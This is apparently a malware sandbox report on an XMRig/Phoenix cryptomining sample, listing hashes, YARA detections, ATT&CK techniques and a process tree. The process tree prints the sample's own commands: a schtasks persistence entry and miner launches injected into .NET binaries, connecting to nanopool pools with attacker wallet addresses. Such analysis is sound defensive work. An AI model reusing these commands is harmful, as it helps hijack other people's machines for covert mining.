xmrig | 90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

Analysis

max time kernel
300s
max time network
303s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
14-03-2023 22:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
Size

903KB
MD5

7b205c65f9092ee01c821aa5b58bcc6b
SHA1

28f2aeded861c37d6fd90ddb791721a653079cfb
SHA256

90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f
SHA512

1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84
SSDEEP

12288:8D5lJ0RelUsuvM/vPmyTIPjdgRSzYr9MUlu1vZdptUG5decIljrG:8D5lWYlUsuvMH+36e70

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detectes Phoenix Miner Payload 7 IoCs

miner

resource	yara_rule
behavioral2/memory/5104-157-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/5104-158-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/5104-159-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/5104-160-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/4028-241-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/4028-242-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix
behavioral2/memory/4028-243-0x0000000140000000-0x000000014082B000-memory.dmp	miner_phoenix

XMRig Miner payload 18 IoCs

miner

resource	yara_rule
behavioral2/memory/2908-138-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-139-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-140-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-142-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-143-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-144-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-145-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-146-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-147-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-161-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/2908-162-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4740-226-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4740-227-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4740-229-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4740-230-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4740-231-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4740-232-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/4740-233-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Executes dropped EXE 2 IoCs

pid	Process
4596	Y.exe
3028	Y.exe

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5104-154-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5104-155-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5104-156-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5104-157-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5104-158-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5104-159-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/5104-160-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/4028-241-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/4028-242-0x0000000140000000-0x000000014082B000-memory.dmp	upx
behavioral2/memory/4028-243-0x0000000140000000-0x000000014082B000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
5104	RegSvcs.exe
5104	RegSvcs.exe
4028	RegSvcs.exe
4028	RegSvcs.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 4596 set thread context of 2908	4596	Y.exe	74
PID 4596 set thread context of 5104	4596	Y.exe	75
PID 3028 set thread context of 4740	3028	Y.exe	85
PID 3028 set thread context of 4028	3028	Y.exe	86

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	SearchUI.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	SearchUI.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3572	schtasks.exe
4036	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4016	timeout.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchUI.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchUI.exe

Modifies registry class 36 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4596	Y.exe
4596	Y.exe
4596	Y.exe
3028	Y.exe
3028	Y.exe
3028	Y.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
636	Process not Found
636	Process not Found

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2548	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
Token: SeDebugPrivilege	4596	Y.exe
Token: SeLockMemoryPrivilege	2908	vbc.exe
Token: SeLockMemoryPrivilege	2908	vbc.exe
Token: SeDebugPrivilege	3028	Y.exe
Token: SeLockMemoryPrivilege	4740	vbc.exe
Token: SeLockMemoryPrivilege	4740	vbc.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2908	vbc.exe
4740	vbc.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
4136	SearchUI.exe
1864	SearchUI.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 2548 wrote to memory of 3216	2548	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	66
PID 2548 wrote to memory of 3216	2548	90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe	66
PID 3216 wrote to memory of 4016	3216	cmd.exe	68
PID 3216 wrote to memory of 4016	3216	cmd.exe	68
PID 3216 wrote to memory of 4596	3216	cmd.exe	69
PID 3216 wrote to memory of 4596	3216	cmd.exe	69
PID 4596 wrote to memory of 2952	4596	Y.exe	70
PID 4596 wrote to memory of 2952	4596	Y.exe	70
PID 2952 wrote to memory of 3572	2952	cmd.exe	72
PID 2952 wrote to memory of 3572	2952	cmd.exe	72
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 2908	4596	Y.exe	74
PID 4596 wrote to memory of 5104	4596	Y.exe	75
PID 4596 wrote to memory of 5104	4596	Y.exe	75
PID 4596 wrote to memory of 5104	4596	Y.exe	75
PID 4596 wrote to memory of 5104	4596	Y.exe	75
PID 4596 wrote to memory of 5104	4596	Y.exe	75
PID 4596 wrote to memory of 5104	4596	Y.exe	75
PID 4596 wrote to memory of 5104	4596	Y.exe	75
PID 3028 wrote to memory of 4048	3028	Y.exe	81
PID 3028 wrote to memory of 4048	3028	Y.exe	81
PID 4048 wrote to memory of 4036	4048	cmd.exe	84
PID 4048 wrote to memory of 4036	4048	cmd.exe	84
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4740	3028	Y.exe	85
PID 3028 wrote to memory of 4028	3028	Y.exe	86
PID 3028 wrote to memory of 4028	3028	Y.exe	86
PID 3028 wrote to memory of 4028	3028	Y.exe	86
PID 3028 wrote to memory of 4028	3028	Y.exe	86
PID 3028 wrote to memory of 4028	3028	Y.exe	86
PID 3028 wrote to memory of 4028	3028	Y.exe	86
PID 3028 wrote to memory of 4028	3028	Y.exe	86

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe
"C:\Users\Admin\AppData\Local\Temp\90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA6E3.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3216
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:4016
- - C:\ProgramData\telemetry\Y.exe
    "C:\ProgramData\telemetry\Y.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4596
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2952
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:3572
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2908
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 0
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:5104

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4136

C:\ProgramData\telemetry\Y.exe
C:\ProgramData\telemetry\Y.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4048
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "Y" /tr "C:\ProgramData\telemetry\Y.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4036
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 42UrSm3AVbdGqvaeJZ41q5EbEH6mrmTPhftracKxsvSo3VKzs3bRkmeMLeuB5Jutkj8A8PzCDjP78gLghgUpSu2fRKrhE9F --tls --coin monero --max-cpu-usage=50 --donate-level=1 -opencl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4740
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe -coin etc -pool etc-eu2.nanopool.org:19999 -wal 0x5d6Be357223Fa03F5ED7032BB88164dec43Ff631.work -log 0
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4028

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1864

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\ProgramData\telemetry\Y.exe

Filesize
903KB

MD5
7b205c65f9092ee01c821aa5b58bcc6b

SHA1
28f2aeded861c37d6fd90ddb791721a653079cfb

SHA256
90ba71e89e1ec33dc1535708f2a9baf55f493bc8e074f5bd5ea32c6d667ecb4f

SHA512
1661d3a16938ec4e9c85510938b1af2598103c26b88cc2a60ea085350d4c38d10715dbceda5711b0b757d4abb7464d7ac7058e98b1a797f07d407f5ed74f0a84

Download Submit
C:\ProgramData\telemetry\chromeupdater.dat

Filesize
4.6MB

MD5
412ff258a6e1abc84d63455fdccfaf14

SHA1
b34119a96f9f0f3f994a3996681af99c013a8332

SHA256
f87a06752fd48643260a706ffc0b9f4b1c9ef0f152290437e566ee2551e18c84

SHA512
ed1a42ed5ebe311bcd26250ce00afb3fd11f8c1acb750b4b4917a4ad447dbe8067ff846dfcae22327100d7fbcc4d1e38d946007287f0feae17b2115d31276413

Download Submit
C:\ProgramData\telemetry\uninstall.dat

Filesize
5.1MB

MD5
a3d7148655137e92c28b33e48d088088

SHA1
bc98804abf481e58c925a0810c519c6c5f2d3ac0

SHA256
5b0bfb92bb76a12c69669a08ef723377b9eaaf50eab6fe83b4c3f21d593f998f

SHA512
ca131ce06bc6cbd47a58cc11f80a4db576effa3325f11222123fd6829589f29f894834679e09c3e50a50ef8019325d1a6fffab07d49fda43179a544ea4697373

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Y.exe.log

Filesize
1KB

MD5
9bfb0f51f319fb79c0bb1f4f9fcfc7e1

SHA1
367776be8a224b0ee8271dce1723eb675a1964b2

SHA256
35d5a38e77d2755271f2897bcfdd673d3d8daa0e6e412c7272fac51aacb101f3

SHA512
0b103c722c983d513724c36da13de8b18845c3a1e4a311326947e448d304a2dbdd717d914ceeb9e8e11a6083f8ccaf7abad1bf4a2ac22e21de91d6cc74ec17bb

Download Submit
C:\Users\Admin\AppData\Local\Packages\microsoft.windows.cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\HMM2HWB4\microsoft.windows[1].xml

Filesize
97B

MD5
28840f4f5ece807a664852066fb8f248

SHA1
a21e39c7615b591d90961c1d1abdd8be131bc2a1

SHA256
0fcd201e265363ed3e996671c86e0f878cde478fb62760bdb56ffa3544e1a3d0

SHA512
abe71f64d3c2078070168d33ef8804b9b5434763f2c38cdbee10871b846dd0c3486deb91f38a78304a7fcee7f224b513850cd04e1d4f5dd93971f18ba660fb0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpA6E3.tmp.bat

Filesize
139B

MD5
38385ecdfa395bf1ac4c9587bc2813ea

SHA1
523cb3b28830a20c64adb05539755a1edcab0fec

SHA256
